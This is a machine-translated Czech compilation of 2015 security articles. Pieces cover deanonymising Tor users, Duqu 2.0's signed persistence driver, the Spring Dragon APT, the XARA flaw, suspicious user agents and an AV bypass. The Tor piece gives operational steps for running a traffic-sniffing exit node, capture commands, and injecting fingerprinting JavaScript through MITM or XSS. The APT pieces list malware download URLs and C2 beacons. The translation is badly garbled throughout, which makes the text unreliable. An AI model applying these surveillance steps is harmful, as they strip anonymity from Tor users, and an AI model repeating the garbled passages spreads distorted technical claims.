Každý obyvatel v síti mohou sdílet jeho / její výpočetních zdrojů uspořádat uzlu serveru. Uzel server je uzlový prvek v síti Tor, který hraje roli zprostředkovatele v oblasti informačních provozu sítě zákazníka dané. V tomto darknet, existuje několik druhů uzlů: relé uzly a Konec uzly. Uzel výjezd je konec odkaz v provozu dešifrování provozu, takže jsou koncový bod, které se mohou stát zdrojem úniku zajímavé informace.

Naším úkolem je velmi specifická: musíme sbírat stávající a co je nejdůležitější, relevantní cibule zdroje. Nemůžeme spoléhat výhradně na motory s vnitřním a / nebo webové stránky katalogů, protože tyto nechat hodně být vyžadováno z hlediska relevance a úplnost obsažených informací.

Nicméně, je zde jednoduché řešení problému agregace příslušných internetových stránkách. Chcete-li seznam cibule zdrojů, které byly v nedávné době navštívili pomocí darknet uživatelem, je třeba sledovat každé instance přístupu k nim. Jak víme, uzel výjezd je koncový bod dráhy, které šifrované pakety následovat v rámci darknet, takže můžeme svobodně zachytit HTTP / HTTPS protokol pakety v okamžiku, kdy jsou dešifrovány v uzlu výjezdu. Jinými slovy, v případě, že uživatel používá darknet jako prostředník mezi jeho / její prohlížeči a webovým zdroj se nachází v pravidelném Internetu, pak výstupní uzel Tor je umístění, kde paketů v nešifrovaném formátu a mohou být zachyceny.

Víme, že paket HTTP mohou obsahovat informace o webových zdrojů, včetně zdrojů, cibule, které byly navštíveny dříve. Tato data je obsažen v požadavku záhlaví "Referrer", který může obsahovat adresu URL zdroje žádosti. V pravidelném internetu, tyto informace pomáhají určit, web mistři žádosti, které vyhledávače nebo weby přímé uživatelé směrem webového zdroje, které spravují.

V našem případě, to je dost skenovat výpis zachycené provozu s regulární výraz, který obsahuje řetězec "cibule".

K dispozici je velké množství dostupných článků o konfiguraci výstupních uzlů, takže nebudeme trávit čas o tom, jak konfigurovat uzlu výstupu, ale místo toho poukázat na pár detailů.

Za prvé, je nutné nastavit výstupní politiku, která umožní dopravní komunikaci napříč všech portech; to by mělo být provedeno v konfiguračním souboru torrc, který se nachází v instalačním katalogu Tor. Tato konfigurace není stříbrná kulka, ale to přece nabízejí šanci vidět něco zajímavého, na non-triviální portu.

>> ExitPolicy přijímat *: *

Pole "Přezdívka" v souboru torrc nemá žádný zvláštní význam, takže jediný doporučení v tomto případě není použít některý viditelný (např 'WeAreCapturingYourTraffic "), názvy uzlů, nebo ty, které obsahují čísla (" NodeNumber3 "), které by mohly navrhnout celou síť těchto uzlů.

Po spuštění serveru Tor, je nutné počkat, dokud se nahraje souřadnic na server adresářů - to pomůže náš uzel prohlásí, že všem účastníkům darknet.

Odhalení uživatelům Tor: kde anonymita končí v darknet

Uzel výstup v provozu

Poté, co jsme spustili režim ukončit, a to začalo předávat provoz Tor uživatelů přes sebe, musíme zahájit paket sniffer provozu a zachytit pomíjivou provoz. V tomto případě, tshark působí jako sniffer, poslech rozhraní # 1 (obsazený Tor) a uvedení výpis do souboru "dump.pcap":

>> Tshark -i 1 -w dump.pcap

Odhalení uživatelům Tor: kde anonymita končí v darknet

Tshark zachycuje pakety, které procházejí uzlu výstupu v nešifrované podobě

Všechny výše uvedené akce musí být provedeno na tolik serverů, jak je to možné shromáždit co nejvíce informací o zájmu jako je to možné. Je třeba poznamenat, že skládka roste velmi rychle, a to by mělo být pravidelně sbírány k analýze.

Takže, jakmile se dostanete obrovskou výpis, to by měly být analyzovány pro cibule zdrojů. Skimming přes skládce pomáhá roztřídit všechny prostředky na uživateli Tor podle typu obsahu.

Je třeba poznamenat, že 24 hodin nepřetržitého provozu zadržení (na pracovním dni) vyrobit až 3 GB skládky pro jeden uzel. Proto nemůže být jednoduše otevřít pomocí Wireshark - nebude možné ji zpracovat. Pro analýzu výpis stavu, musí být rozdělena do menších souborů, ne větší než 200 MB (tato hodnota byla určena empiricky). Chcete-li tak učinit, utility "editcamp" se používá spolu s Wireshark:

>> Editcap - c 200.000 input.pcap output.pcap

V tomto případě, 200000 představuje počet paketů v jediném souboru.

Při analýze výpis, úkolem je hledat řetězce obsahující podřetězec ".onion". To s největší pravděpodobností bude najít vnitřní zdroje Tor. Nicméně, takový pasivní sledování není nám umožní de-anonymizovat uživatele v plném smyslu toho slova, protože výzkumník může analyzovat pouze ty údaje síťové pakety, které uživatelé dělají dispozici "z vlastní vůle".

Aktivní systém monitorování

Chcete-li se dozvědět více o darknet obyvatel musíme je vyprovokovat rozdávání některé údaje o jejich prostředí. Jinými slovy, potřebujeme aktivní systém sběru dat.

Odborník na Leviathan Security objevil velké množství výstupních uzlů a představil živý příklad aktivního monitorovacího systému při práci v terénu. Uzly byly odlišné od jiných výstupních uzlů v tom, že injekcí škodlivý kód na toto binárních souborů, která v nich. Zatímco klient stažený soubor z Internetu, pomocí Tor zachovat anonymitu, škodlivý výstupní uzel provedl MITM-útok a zasadil škodlivý kód do binární soubor ke stažení.

Tento incident je dobrým příkladem konceptu aktivního monitorovacího systému; Nicméně, to je také dobrým příkladem jeho rubu: jakákoliv činnost při uzlu přesunů (jako je manipulace dopravy) se rychle a snadno identifikovat automatické nástroje, a uzel je ihned na černé listině Tor komunitou.

Pojďme začít znovu s čistým štítem

HTML5 nám přinesla nejen WebRTC, ale také zajímavý tag "plátno", který je navržen tak, aby vytvářet bitmapové obrázky pomocí JavaScriptu. Tato značka má zvláštnost v tom, jak to skýtá obrázků: každý internetového prohlížeče poskytuje obrazy odlišně v závislosti na různých faktorech, jako jsou:

Různé grafických ovladačů a hardwarové komponenty instalované na straně klienta;
Různé sady softwaru v operačním systému a různých konfiguracích softwarového prostředí.
Parametry poskytnutých snímků lze jednoznačně identifikovat webového prohlížeče a jeho softwarové a hardwarové prostředí. Na této zvláštnosti základě tzv otisku prstu může být vytvořen. Tato technika není nová - se používá, například tím, že některé on-line reklamní agentury pro sledování zájmů uživatelů. Avšak ne všechny jeho metod může být realizován v Tor Browser. Například, supercookies nelze použít v Tor Browser, Flash a Java je ve výchozím nastavení zakázána, použití písma je omezeno. Některé jiné metody, zobrazí upozornění, které mohou upozornit uživatele.

Tak, naše první pokusy o plátna z otisků prstů a s pomocí funkce getImageData (), který extrahuje obrazová data, byly blokovány Tor Browser:

Odhalení uživatelům Tor: kde anonymita končí v darknet

Nicméně, některé mezery jsou stále otevřené v této chvíli, s níž otisků prstů v Tor může být provedeno bez vyvolání upozornění.

Svými písem my jim musí vědět

Tor Browser lze identifikovat pomocí funkce measureText (), který měří šířku textu vyneseným v plátně:

Odhalení uživatelům Tor: kde anonymita končí v darknet

Použití measureText () pro měření velikosti písma, který je jedinečný pro operační systém

Pokud je výsledný šířka písmo má jedinečnou hodnotu (to je někdy plovoucí bodová hodnota), pak můžeme identifikovat prohlížeče, včetně Tor Browser. Jsme si vědomi, že v některých případech se mohou výsledné hodnoty šířky písma je stejná pro různé uživatele.

Je třeba poznamenat, že se nejedná pouze funkce, která může získat jedinečné hodnoty. Další taková funkce je getBoundingClientRect (), který může získat výšku a šířku textu hraničního obdélníku.

Když problém snímání otisků prstů uživatelů stala známou ke komunitě (to je také důležité, aby uživatelé Tor Browser), odpovídající žádost byla vytvořena. Nicméně, Tor vývojáři prohlížeče jsou v žádném spěchu, které vyřeší tuto nevýhodu v konfiguraci s tím, že černé listiny takové funkce je neúčinná.

Odhalení uživatelům Tor: kde anonymita končí v darknet

Oficiální odpověď Tor vývojáře k problému vykreslování písmo

Polní pokusy

Tento přístup byl aplikován výzkumníkem přezdíval "KOLANICH". Pomocí obě funkce, measureText () a getBoundingClientRect (), napsal scénář, testováno ve lokálně v různých prohlížečích a získat jedinečných identifikátorů .

Použitím stejné metodiky, jsme uspořádali testovací postel, zaměřené na snímání otisků prstů Tor Browser v různých softwarových a hardwarových prostředí.

Pro řešení tohoto problému, jsme použili jeden autor blog a vložené si JavaScript, který používá measureText () a getBoundingClientRect () funkce pro měření písma poskytované ve webovém prohlížeči uživatele návštěvě webové stránky. Skript pošle naměřené hodnoty v požadavku POST na webový server, který, podle pořadí, šetří tento požadavek ve svých protokolech.

Odhalení uživatelům Tor: kde anonymita končí v darknet

Fragment protokolu webového serveru s viditelnou Tor Browser otisků prstů

V této době jsme sbírání výsledky tohoto skriptu operačního. K dnešnímu dni jsou všechny vrácené hodnoty jsou jedinečné. Budeme zveřejňovat zprávu o výsledcích v řádném termínu.

Možné praktické dopady

Jak lze tento koncept být použit v reálných podmínkách k identifikaci uživatelů Tor Browser? Kód JavaScript popsané výše může být nainstalován na několika objektech, které se podílejí na datový provoz v darknet:

Konec uzel. MITM-útok je implementován, během kterého je kód JavaScript vstříkne do všech webových stránek, které o darknet rezidentní návštěvy ve vnějším webu.
Vnitřní zdroje cibule a externích webových stránek ovládané útočníků. Například útočník zahajuje "dveře", nebo webové stránky speciálně vytvořené s konkrétní publikum v zobrazení, a otisky prstů všem návštěvníkům.
Vnitřní a vnější webové stránky, které jsou náchylné k cross-site scripting (XSS) zranitelnost (nejlépe skladovat XSS, ale to není podstatné).
Odhalení uživatelům Tor: kde anonymita končí v darknet

Objekty, které by otisk prstu uživatele Tor

Poslední položkou je obzvláště zajímavé. Máme naskenované asi 100 cibulové zdroje pro webové zranitelnosti (tyto prostředky byly v protokolech z pasivního monitorovacího systému) a odfiltrovány "falešně pozitivních". Tak, jsme zjistili, že asi 30% analyzovaných zdrojů darknet jsou náchylné k cross-site skriptování útoky.

To vše znamená, že uspořádání farmu výstupních uzlů není jedinou metodou, útočník může použít k de-anonymizovat uživatele. Útočník může také ohrozit www stránek a zajistíme vchody, umístěte kód JavaScriptu tam a sbírat databázi unikátních otisků prstů.

Odhalení uživatelům Tor: kde anonymita končí v darknet

Proces de-anonymity pro uživatele Tor

Takže útočníci nejsou omezeny na vstřikování javascriptový kód do legálních internetových stránkách. Existuje více objektů, kde je možné kód JavaScript injekčně, který rozšiřuje počet možných bodů přítomnosti, včetně těch, které v rámci darknet.

Na základě tohoto přístupu, útočník by mohl, teoreticky, zjistit, například, místa na jaká témata jsou v zájmu uživatele s jedinečným otisků "c2c91d5b3c4fecd9109afe0e", a na které stránky, které uživatel přihlásí. Výsledkem, útočník ví, že profil uživatele na webové zdroje a historii surfování uživatele.

V místě uzavření

Na oficiálních internetových stránkách Tor projektu, vývojáři zaslali odpověď na otázku "proč je povolen JavaScript Tor Browser?":

Odhalení uživatelům Tor: kde anonymita končí v darknet

Tor Browser oficiální odpověď na otázku o JavaScriptu

Zdá se, z této odpovědi, že bychom neměli očekávat, že vývojáři zakázat kód JavaScript v TorBrowser.


Duqu 2.0 Přetrvávání modul
20.6.2015 Viry

Již dříve jsme popsáno , jak Duqu 2,0 nemá normální "persistence" mechanismus. To může vést uživatele k závěru, že proplachování ven malware, je stejně jednoduché jako restartování všech infikovaných počítačů. Ve skutečnosti, věci jsou trochu složitější.

Útočníci vytvořil neobvyklou perzistence modul, který se nasadit na kompromitovaných sítích. Slouží dvojí funkci - je to také podporuje skryté C & C komunikační schéma. Tato organizace úroveň persistence je dosaženo pomocí ovladač, který je nainstalován jako normální systémová služba. Na 64-bitových systémech, to znamená přísný požadavek na digitální podpis Authenticode. Viděli jsme dva takové řidiči persistence nasazených v průběhu útoků.

Během jejich operací herci Duqu hrozeb nainstalovat tyto škodlivé ovladačů na firewally, bran nebo jiných serverů, které mají přímý přístup k internetu na jedné straně a firemní přístup k síti na druhé straně. Tím, jejich použití, mohou dosáhnout několika cílů najednou: přístup k vnitřní infrastrukturu z internetu, vyhnout se záznamy protokolu ve firemních proxy serverů a udržovat formu přetrvávání po všem.

V podstatě, řidiči jsou přesměrování síťové toky do a ze brány stroje, který jej provozuje. Chcete-li předat spojení, útočník musí nejprve projít založené na síti "klepání" mechanismus pomocí tajného klíčového slova. Viděli jsme dvě různé tajné klíčová slova ve vzorcích jsme dosud shromážděných: " romanian.antihacker "a" ugly.gorilla " .

Popsali jsme jeden z těchto ovladačů v naší whitepaper o Duqu 2.0 (viz " The "portserv.sys" řidiče analýzy oddíl "). Pojďme zopakovat některé z nejvíce důležitých detailů. Řidič poslouchá k síti a očekává, že speciální tajné klíčové slovo (" romanian.antihacker "V tom případě). Za to, že ukládá IP hostitele, který prošel správný tajný klíčové slovo a začne přesměrovat všechny pakety z portu 443-445 (SMB) nebo 3389 (Remote Desktop) tohoto serveru. Toto účinně umožňuje útočníkům na tunelu SMB (tj vzdálený soubor přístup do systému) a Remote Desktop prostřednictvím serveru brány a přitom to vypadalo jako HTTPS (port 443).

Kromě řidiče "romanian.antihacker", objevili jsme, ještě jeden, které se podobný práci, nicméně, podporuje více připojení v obecnějším způsobem:

Pokud řidič uznává tajné klíčové slovo " ugly.gorilla1 ", pak bude veškerý provoz od útočníka IP přesměrováni z portu 443 (HTTPS) na 445 (SMB)
Pokud řidič uznává tajné klíčové slovo " ugly.gorilla2 " poté veškerý provoz od útočníka IP bude přesměrován z portu 443 (HTTPS) na 3389 (PRV)
Pokud řidič uznává tajné klíčové slovo " ugly.gorilla3 ", pak bude veškerý provoz od útočníka IP přesměrováni z portu 443 (HTTPS) na 135 (RPC)
Pokud řidič uznává tajné klíčové slovo " ugly.gorilla4 "poté veškerý provoz od útočníka IP bude přesměrován z portu 443 (HTTPS) na 139 (NetBIOS)
Pokud řidič uznává tajné klíčové slovo " ugly.gorilla5 ", pak bude veškerý provoz od útočníka IP přesměrováni z přístavu 1723 (PPTP) a 445 (SMB)
Pokud řidič uznává tajné klíčové slovo " ugly.gorilla6 ", pak bude veškerý provoz od útočníka IP přesměrováni z portu 443 (HTTPS) na 47012 (v současné době znám).
Rádi bychom si uvědomit, že jeden přístav tady vypadá docela podezřelé: 47012. Zatím jsme neviděli žádné další součásti Duqu 2,0 pomocí tohoto portu, ani jsme našli jinou společnou malware, backdoor nebo legitimní software pomocí tento port (také podle SANS). Nicméně se domnívá, že toto číslo portu se napevno do malware to může být dobrým ukazatelem kompromisu pro Duqu 2.0.

duqu2_1

Část malware s řadou tajných klíčových slov

Tento 64-bit ovladač obsahuje interní název DLL, "termport.sys", zatímco název souboru v souborovém systému byla "portserv.sys". To s největší pravděpodobností znamená, že útočníci změní názvy souborů pro různé operace a detekci tohoto útoku by se neměla spoléhat výhradně na názvy souborů. Kompilace Časové razítko je zřejmě falešný zde: " 23 července 2004 18:14:28 ". Všechny objevené soubory ovladače se nachází v "C: \ Windows \ System32 \ drivers \".

Snad nejdůležitější součástí tohoto útoku strategie je digitální podpis používá pro 64bitové ovladače. Protože se jedná o povinný požadavek na 64-bitových systémech Windows, řidič měl platný digitální podpis. To bylo podepsáno " Hon Hai Precision Industry CO. LTD. " (také známý jako " Foxconn Technology Group ", jeden z největších výrobců elektroniky na světě).

duqu2_2

Digitální podpis řidiče útočníka

Podle informací od řidiče byla podepsána v 20:31 dne 19.02.2015. Níže jsou uvedeny některé další podrobnosti poskytované SysInternal je sigcheck nástroje:

Ověřeno: Podepsáno
datum podepsání: 20:31 19.02.2015
Nakladatel:.. Hon Hai Precision Industry CO LTD
Popis: Port optimalizaci pro Terminal Server
produkt: Microsoft Windows Operační systém
Prod verze: 6.1.7601
verze souboru: 6.1.7601 postavený: WINDDK
stroje: 64-bit
MD5: 92E724291056A5E30ECA038EE637A23F
SHA1: 478C076749BEF74EAF9BED4AF917AEE228620B23
PESHA1: F8457AFBD6967FFAE71A72AA44BC3C3A134103D8
PE256: 2891059613156734067A1EF52C01731A1BCFB9C50E817F3CA813C19114BFA556
SHA256: BC4AE56434B45818F57724F4CD19354A13E5964FD097D1933A30E2E31C9BDFA5
Podle Wikipedie "Foxconn Technology Group" je největším světovým výrobcem elektroniky smlouvy a sídlí v Tucheng, New Taipei, Tchaj-wan.

Hlavní zákazníci společnosti Foxconn patří nebo byly zahrnuty některé z největších světových podniků:

Acer Inc.
Amazon.com
Apple Inc.
BlackBerry Ltd.
Cisco
Dell
Google
Hewlett Packard
Huawei
Microsoft
Mobility Motorola
Nintendo
Nokia
Sony
Toshiba
Xiaomi
Vizio
Foxconn vyrábí několik populární https://en.wikipedia.org/wiki/Foxconn produktů, včetně BlackBerry, iPad, iPhone, Kindle, PlayStation 4, Xbox One a Wii U.

Stejný Certifikát byl použit výrobcem podepsat několik ovladačů WatchDog Timer Kernel (WDTKernel.sys) pro notebooky Dell v únoru 2013.

Závěry

Během našeho předchozího výzkumu do Stuxnet a Duqu Pozorovali jsme digitálně podepsané malware (pomocí škodlivého JMicron a Realtek CERT ). Krást digitální certifikáty a podepisování malware jménem legitimních podniků se zdá být pravidelný trik z útočníků Duqu. Nemáme žádné potvrzení, že některý z těchto dodavatelů být zneužit, ale naše ukazatele rozhodně ukazují, že útočníci Duqu mají velký zájem o výrobci hardwaru, jako je Foxconn, Realtek a JMicron. To se potvrdilo v 2014/2015 útocích, když jsme pozorovali infekce spojené s výrobci hardwaru z APAC, včetně ICS a SCADA výpočetní techniky výrobců.

Dalším zajímavým poznatkem je, že vedle těchto ovladačů Duqu jsme se odhalili jiný malware podepsané se stejnými certifikáty. To vylučuje možnost, že certifikáty byly unikly a jsou používány více skupin. To také naznačuje, že útočníci Duqu jsou jediní, kteří mají přístup k těmto certifikátů, které posiluje teorii, oni hacknutý výrobci hardwaru za účelem získání těchto certifikátů.

Nakonec, to je zajímavé, že útočníci Duqu jsou také dost na to, aby dvakrát používat stejný digitální certifikát opatrný. To je něco, co jsme viděli u Duqu z obou 2011 a 2015. Pokud je to pravda, pak to znamená, že útočníci mohou mít dost alternativní ukradené digitální certifikáty od jiných výrobců, které jsou připraveny k použití během dalšího cíleného útoku. To by bylo velmi alarmující, protože účinně podkopává důvěru v digitálních certifikátů.

Oba Verisign a Hon Hai byli informováni o použití certifikátu k podpisu malware Duqu 2.0.

IOC

Ukázka MD5 (portserv.sys): 92e724291056a5e30eca038ee637a23f

Pořadové číslo Foxconn certifikátu používaného Duqu útočníky:

25 65 41 04 61 90 e2 33 f8 B0 9f 9e b7 c8 8e f8

Plná certifikát škodlivého řidiče:

--BEGIN CERTIFICATE--


Jarní Dragon APT
20.6.2015 APT

Pojďme prozkoumat několik zajímavých dodávek techniky z APT aktivní za posledních několik let, jaro Dragon APT. Papír dnes zveřejnila našimi kolegy v Palo Alto Networks představila část údajů o této posádky pod značkou " Lotus Blossom operace ", pravděpodobně pojmenovaný pro ladění řetězce přítomné v hodně z" Elise "codebase od nejméně 2012:" d: \ lstudio \ projekty \ lotus \ ... ".

Lotus Elise backdoor PNR

Schopnosti skupiny jsou více než hodně diskutovaných CVE-2012-0158 využije více než v posledních několika letech. Místo toho, skupina je známo, že zaměstnané půlden spearphish exploity, strategické webové kompromisy, a zalévání díry zaměstnávat aktualizace falešný Flash player re-směr. Skupina je spearphish sada nástrojů zahrnuje PDF exploity, Adobe Flash Player využije, a společné CVE-2012-0158 Word využívá včetně těch, které generuje z nechvalně známé stavebnice "Tran Duy Linh". Zatímco probíhající útoky Spring Dragon APT trvat nás zpět do zaměření na Vietnamu, ale zdá se, že válí stabilní mix exploitů proti obranných subdodavatelů po celém světě a vládní souvisejících organizací v VN, TW, PH, a na dalších místech přes Několik posledních let. Pojďme se rychle podívat na pár příkladů více svých možností narušení, které nebyly uvedeny jinde.

image01

Organizace se nachází v Myanmaru a cílené na jarním Dragon šly nevyslovený. Ale proniknutí techniky jarní Dračí tam nebyli jen 0158 spearphish, ale také napadené weby. V jednom případě, oni nahradili specializované montážní firmy písma potřebné k tomu, aby Myanma písmo. Můžete vidět obraz zde internetových stránek "Planet Myanmar", na konci roku 2012 distribuci takový balíček. Všechny zip odkazy byly přesměrovány do otráveným installer zip souboru. Jméno stahování bylo "Zawgyi_Keyboard_L.zip", a to upustil "setup.exe", který obsahoval několik backdoor komponent, včetně Elise "wincex.dll" (a42c966e26f3577534d03248551232f3, detekovaných jako Backdoor.Win32.Agent.delp). To majáky se s typickou Elise GET "GET /%x/page_%02d%02d%02d%02d.html", jak je uvedeno v dokumentu Lotus Blossom.

Další APT později zneužil přesně tuto stránku dodávat škodlivý VBS (CVE-2014 - 6332), využije v listopadu 2014 s odpornou variantou užitečného zatížení. A že stejná skupina také sloužil škodlivý PDF zneužít (CVE-2010-2883), z tohoto webu v červnu 2012 jako "Zawgyi Unicode Keyboard.pdf". Ještě dříve, než to, že oni spearphished se stejným PDF využít objekt později umístěn na webových stránkách pod různými názvy souborů. V listopadu 2011, oni používají názvy souborů vhodných pro své spearphishing cílů s tím využívat jako "台灣 安 保 協會「 亞太 區域 安全 與 台海 和平 」國際 研討會 邀 請 函 _20110907.pdf" ("Taiwan Sdružení Security International seminář Pozvánka - v Asii -Pacific regionální bezpečnost a mír v Taiwanské úžině ")," china-central_asia.pdf "," vodní sector.pdf ", a různé vládní související návrhy. V tomto případě došlo k neočekávanému překrytí ze dvou APT.

Dalším zajímavým technika, která jsme pozorovali v použití proti vládním cílům byla kampaň, která lákal příjemců na místě přesměrování uživatele na instalační podvodného webu Flash.

image03

Toto místo v pořadí přesměrován uživatele na Flash instalátor svázaný se společným Elise backdoor, případně komunikaci s 210.175.53.24 a jeho obvyklé "GET /14111121/page_321111234.html HTTP / 1.0".

hxxp: //www.bkav2010.net/support/flashplayer/downloads.html → přesměrováni na
hxxp: //96.47.234.246/support/flashplayer/install_flashplayer.exe (Trojan-Dropper.Win32.Agent.ilbq)

I když tento konkrétní herec efektivně využít své téměř opotřebované CVE-2012-0158 exploity v minulosti, Spring Dragon zaměstnává více zapojeni a tvůrčí činnost rušivé stejně.


OS X a iOS Neoprávněný Cross Aplikace Resource Access (XARA)

19.6.2015 Zranitelnosti
Posledních pár dnů, papír s detaily o Xara zranitelnosti v OS X a iOS je stále hodně pozornosti [1]. Pokud jste ho ještě neviděli termín "Xara" před, pak je to pravděpodobně proto, že cross-aplikace-resource-přístup byl normální v minulosti. Různé aplikace má přístup k navzájem na údaje, pokud stejný uživatel spustil je. Ale v poslední době, operační systémy, jako OS X a iOS dělal pokusy "pískoviště" aplikací a izolovat aplikace od sebe, i když stejný uživatel běží jim.

Tyto pískoviště měly zabránit jedinou škodlivý aplikace v ohrožení celý systém.

iOS používá písek-boxoval aplikace výhradně jako omezuje instalace aplikace do App Store. V OS X, aplikace stažené z App Store, musí zavést písek-box. Ale uživatelé stále moci stahovat libovolné aplikace, které nepoužívají písek-box. Například, jeden z důvodů, neexistují žádné účinné anti-malware aplikací pro iOS je, že neexistuje žádný způsob, jak načíst aplikaci, která by mít oprávnění, aby prováděli inspekce jiných aplikací.

Nicméně, aplikace je třeba ještě mluvit s každým jiný, a vývojáři používat různé metody, které nabízí operační systém pro odesílání dat k sobě navzájem. Tento dokument se nastínit, jak některé z těchto metod lze použít pro přístup k dalším aplikacím mimo tam zamýšleném rozsahu.

Chcete-li vysvětlit na příkladu, budu používat přístup "Přívěsek na klíče", která způsobila pravděpodobně nejvíce titulky. Pro ostatní, a pro více informací, naleznete v původním dokumentu.

Pokud aplikace by chtěli uložit heslo do iOS nebo OS X klíčenka, je třeba vytvořit novou položku. Aplikace zkontroluje, zda vstup je to s názvem již existuje. K dispozici jsou dvě možnosti:

- Hodnota dosud neexistuje (poprvé uživatel nastaví heslo v této žádosti)

V tomto případě, bude aplikace vytvořit nový záznam. To má možnost zajistit ji pouze poskytováním některých aplikací přístup k hodnotě. Například, pokud budeme publikovat několik aplikací, pak bychom mohli dovolit všichni z našich aplikací pro přístup k této položky.

- Hodnota již existuje (uživatel již nakonfigurován heslo)

V tomto případě, pokud aplikace má přístup k položce, může přepsat nebo číst ji. Pokud jiná aplikace náhodou použít stejný název, pak položka by měla být uzamčena, pokud tato jiná aplikace implementována Keychain položku správně.

Nicméně, škodlivý aplikace, pokud spustíte před žádosti o oběti, může nastavit položku hesla se stejným názvem jako aplikace oběti pokud oběť neměla konfigurovat ještě heslo. Škodlivá aplikace by pak vytvořit položku, která je otevřená do aplikace oběti a samozřejmě zůstává otevřená ke škodlivému aplikace.

Jak již bylo zmíněno dříve, Keychain je jen jedním z rysů, kteří trpí problémy s křížovým přístupem aplikací zdrojů. Z větší části, to musí být stanovena podle operačního systému, a může požadovat pozměňující rozhraní API, které nemusí být zpětně kompatibilní. Dále, vývojáři aplikací může být schopen přidat nějaké zmírnění, ale není jasné, jaké metody bude pracovat pro různé případy zneužívání Xara.

Jako běžný koncový uživatel, jediná věc, kterou můžete udělat, je být opatrný na to, co aplikace, které nainstalujete. Pro iOS, může Apple k jeho procesu přezkumu aplikace přidat další položky, Kontrolní seznam, ale autoři papíru se podařilo publikovat důkaz pojetí aplikace.

Pro vězení rozbité iOS zařízení, nebo pro OS X uživatelé instalují boxoval non-písek aplikací, tuto chybu zabezpečení nepředstavuje žádná nová rizika. Mobilní malware zejména je stále poněkud neobvyklé.

[1] https://drive.google.com/file/d/0BxxXk1d3yyuZOFlsdkNMSGswSGs/view


Liché HTTP User Agents

19.6.2015 Bezpečnost
Mnoho webových aplikací firewally blokují liché uživatelských agentů. Nicméně, slušné zranitelnosti skenery se bude snažit vyhnout tyto jednoduché ochranu a snaží se napodobit uživatelského agenta řetězec běžně používaných prohlížečů. Chcete-li zjistit, jestli mohu rozlišit špatné od dobrého, jsem porovnal některé protokoly z našich honeypots do protokolů z normálního webového serveru (isc.sans.edu). Mnoho z nejlepších uživatelských agentů dopadajících na Honeypot jsou jen stěží vidět na běžných internetových stránkách, že mi k identifikaci možných zranitelnosti skenery.

Za prvé: Existuje řada legitimních skriptů, které Anketa naše data na isc.sans.edu. Zatímco například "Python" je používán mnoha zranitelnosti skenery, máme dobrý počet python skriptů pomocí našeho API. Pokusil jsem se odstranit některé těchto požadavků.

Liché oprávněný uživatel látky:
První umožňuje začít s pár podivných uživatelských agentů z našeho běžného stránkách:

User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64, rv: 17,247) Gecko / 20100101 Firefox / 17,247
Ano, řetězec "User-Agent:" je součástí řetězce User Agent. Verze Firefoxu je také stará ... (pokud legit vůbec. Nemám Firefox 17 kolem ověřit). Tento user agent řetězec je používán službou monitorovací uptime webových stránek. Předpokládám, že developer ne zcela pochopit, jak nastavit uživatelského agenta, a skončil s extra "User-Agent:" text.

Mozilla / 5.0 (compatible; MJ12bot / v1.4.5; http://www.majestic12.co.uk/bot.php?+)
Nevidím žádné skutečné útoky "Majestic", ale oni jsou jistě agresivní bot. Jak bylo vysvětleno na svých stránkách, můžete si stáhnout bot a cílem je vybudovat distribuované sítě obsahu založené bot spidering web.

Zranitelnost skenery
Následující uživatel agenta řetězce jsou mnohem častější v naší honeypot pak v naší běžné webové stránky, což naznačuje, že tyto uživatelské agenti jsou používány zranitelnosti skenery. Nicméně, tito jsou (v některých případech) oprávněný uživatel agenti.

Mozilla / 5.0 (Windows NT 6.1; WOW64, rv: 8,0) Gecko / 20100101 Firefox / 8.0
Starou verzi Firefoxu. # 1 uživatel agenta právě teď v naší honeypot. Firefox / 8.0 nezobrazuje v top 1.000 uživatelských agentů používá na isc.sans.edu.

Mozilla / 5.0 (X11, Ubuntu, Linux x86_64, rv: 37,0) Gecko / 20100101 Firefox / 37,0
# 2 na našem honeypot. Jistě ... tam může být někteří lidé procházení internetu používáte Firefox 37 (poslední verze) na Ubuntu. Ale rozhodně ne vaše # 2 nejčastější prohlížeč. Na našem reálném systému, tento uživatel agenta přijde jako # 220.

masscan / 1.0 (https://github.com/robertdavidgraham/masscan)
# 3 v naší honeypot je masscan. Samozřejmě je to bezpečné blokovat Vulnerability Scanner.

Opera / 9.80 (X11; Linux x86_64) Presto / 2.12.388 Version / 12.16
Po několika zjevných botů (např Baidu), máme Opera, prohlížeč, který nezobrazuje vůbec v Top 100 uživatelských agentů používaných na našich webových stránkách ISC.

Takže co můžete dělat s touto informací?

- Některé blokování na firewallu webových aplikací je asi dobrý nápad pro nástroje jako masscan. Možná budete chtít, aby jim povolit, pokud jsou používány legitimními pentesters či zranitelností, které používáte k testování svých webových aplikací.

- Pokud se některé z těchto uživatelských agentů mají legit použití, ale jsou častěji používány ve zlém úmyslu, jejich použití pro vaše hodnocení protokolu. Podívejte se, co druh žádostí naleznete více pravděpodobný od lichých (většinou zastaralé) uživatelských agentů. Mnoho nástrojů použít aktuální uživatelský agent, když jsou vytvořeny, ale pak uživatel agent nikdy aktualizovány tak, že skončí s zastaralými řetězců uživatelský agent, které začínají na "vystrčit" jako většina vašich uživatelů upgrade.

- Slušná web aplikační firewally bude hledat jiné artefakty, jako je cílem záhlaví, k ověření uživatelského agenta. Vidíme také uživatelských agentů jako Googlebot zneužil (zobrazit předchozí deník o identifikaci falešných google roboty).


CVE-2014-4114 a Zajímavá AV Bypass Technika

19.6.2015 Zranitelnosti
Citizenlabs nedávno hlášeny na CVE-2014-4114 kampaň proti prodemokratických / pro-tibetské skupiny v Hong Kongu. Útoky děje by nemělo nikoho překvapit, ani že útoky byly sofistikované. Zranitelnost sám byl záplatované s MS14-060 a byl používán apt a trestné činnosti skupiny pro někdy. Trend Micro napsal dobrou zápisu-up problému zde .

Co je zajímavé, je to, co ve skutečnosti, je anti-virus bypass, který byl zaměstnán u herců. Tento obtok byl projednán v této zprávě (prohlášení o vyloučení odpovědnosti, z mé pracovní den). V krátkosti, když CVE-2014-4114 zneužití kódu byla uvedena do PPSX souboru generovaných využít sady, to vyvolalo AV. Když byl stejný soubor uložen jako PPS soubor, tytéž AV motory zastavit odhalovat ji. Formát PPSX souboru (Powerpoint formát slideshow / XML) je modernější formát. Formát PPS byla použita v Office 97-2003 ve formátu OLE. Přestože AV motory zastavit detekci nebezpečný dokument, využívat kód běžel bez problému.

První stánek s jídlem je, samozřejmě, záplatovat vaše systémy a je s podivem, kolik cílené politické organizace se zdá citlivé na činech, které měly patche se celé měsíce.

Druhým je, stejný škodlivý kód může být zastoupen rozdílně v různých typů souborů a její důležité, aby pokrytí těchto jiných formátů, aby zajistila kompletní ochranu.


Kyberzločin je výnosný byznys, návratnost je až 1425 %

